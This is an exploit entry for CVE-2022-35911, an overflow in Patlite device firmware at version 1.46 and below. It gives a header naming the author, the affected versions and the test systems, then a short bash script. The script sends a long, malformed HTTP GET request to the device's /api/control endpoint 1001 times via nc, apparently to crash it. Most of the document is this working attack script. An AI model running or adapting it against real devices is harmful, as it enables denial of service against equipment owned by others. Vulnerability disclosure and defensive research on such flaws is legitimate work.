# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and bellow are affected
# Tested on: CentOs & Ubuntu
# CVE : CVE-2022-35911


#!/bin/bash

IP="192.168.1.101"
PORT="80"

for i in {0..1000}; 
do 
  echo "[$i]: "; 
  echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; 
done > /dev/null 2>&1